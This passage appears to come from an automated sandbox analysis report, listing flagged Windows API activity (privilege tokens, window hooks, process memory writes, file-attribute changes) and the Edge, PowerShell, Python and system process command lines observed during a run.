N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3884 wrote to memory of 2876 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2876 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 4588 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 4588 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe1cc83cb8,0x7ffe1cc83cc8,0x7ffe1cc83cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1872 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1284 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4748 /prefetch:2

